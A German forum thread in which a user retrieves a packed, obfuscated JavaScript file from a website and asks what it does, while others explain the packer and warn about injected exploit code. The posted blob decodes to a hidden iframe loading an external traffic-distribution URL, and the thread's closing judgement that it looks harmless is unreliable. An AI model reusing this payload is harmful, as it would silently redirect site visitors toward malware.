Moin,
kann mir jemand sagen, ob und wenn ja wie ich ein Javascript von einer Webseite auslesen kann???
Eingebettet ist es so:
[script src="in.js" type="text/javascript"][/script>]
Würde gerne wissen, was sich dahinter versteckt.
Gruß
Aragorn75
Homepage selbermachen 7.852 Themen, 35.619 Beiträge
Hallo Aragon75,
suche mal in den Ordnern Deines Browser-Caches nach der Datei "in.js", sie wird dort aber dann beim IE "in.js(1)" heißen. Dort müsste sie auf Deinem Rechner liegen, wenn Du die Seite aufgerufen hast.
Die Datei selbst kannst Du dann mit einem Editor z.B. Notepad öffnen und lesen.
Gruß
ewbayern
Sorry,
nicht "in.js(1)" sondern: "in(1).js"
Gruß
ewbayern
Oh mann, hätte ich auch drauf kommen können... Danke
Wobei es betrifft den FF und da geht es nur über "about:cache"...
So, nun müsste mir das noch einer erklären können:
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('v(u(\'%5%c%d%t%i%3%g%1%e%m%a%0%1%3%s%p%r%0%j%a%h%i%3%6%4%a%d%b%2%9%1%1%w%o%7%7%8%c%c%8%f%3%C%4%1%h%1%4%e%c%a%8%7%1%5%4%7%0%g%e%d%8%0%z%y%2%6%m%0%5%1%9%b%2%l%2%6%9%3%0%8%9%1%b%2%l%2%6%4%1%n%f%3%b%2%A%0%4%0%B%0%f%0%1%n%o%6%9%0%5%5%3%g%q%2%k%r%7%0%j%a%h%i%3%k%p%x%q\'))',39,39,'69|74|27|65|73|64|20|2f|67|68|72|3d|6f|63|2e|6c|6e|61|6d|66|3e|31|77|79|3a|22|3b|3c|28|75|unescape|eval|70|29|33|3f|76|62|2d'.split('|'),0,{}));
Ich versteh da garnix...
Da hat jemand einen Code-Obfuscator / -Packer eingesetzt , mutmaßlich den von Dean Edwards, um genau das zu erreichen: Dass man den Code nicht einfach lesen kann (nebenbei wird er auch etwas komprimiert). Das kann mehrere Hintergründe haben. Zum einen könnte der Webmaster denken das sei nötig, damit seine "wertvollen" Scripte nicht einfach "geklaut" werden, zum anderen könnte der Webmaster gedacht haben dass der Original-Code zu groß war und ihn verkleinert haben wollen.
Was aber in letzter Zeit immer häufiger der Fall ist: Damit soll Exploit-Code versteckt werden und so etwas taucht in den letzten Wochen vermehrt im Zusammenhang mit Massenhacks auf Webservern auf wobei Webseiten solcherart verschleierter Code injiziert wird.
Es ist zwar prinzipiell möglich zu ermitteln was der Code macht, es ist aber verhältnismäßig aufwändig. Wenn Du also den Zusammenhang erläuterst von wo Du an den Code kamst und warum Du daran besonders interessiert bist kann man vielleicht schon etwas auf die Funktion schließen.
Man könnte die Datei auch einfach über die URL aufrufen ;-) Das ist deutlich bequemer als im Cache herumzuwühlen...
Gruß
Borlander
Man könnte die Datei auch einfach über die URL aufrufen ;-) Das ist deutlich bequemer als im Cache herumzuwühlen...
In der tat, wobei die URL relativ zur beinhaltenden seite ist, genau wie bei pfadangaben von dateien.
Z.b.: Aus "in.js" in der seite "http://www.domain.de/docs/index.html" wird "http://www.domain.de/docs/in.js" (also ohne index.html).
Fängt die URL mit "/" an, dann beginnt man hinter der domain-angabe.
mr.escape
Kann mir keiner den o.g. Inhalt der Datei erklären???
Es kommt das dabei heraus:
document.write("
mr.escape
Vielen Danke, sieht harmlos aus...
Hatte da wohl einen falschen Verdacht.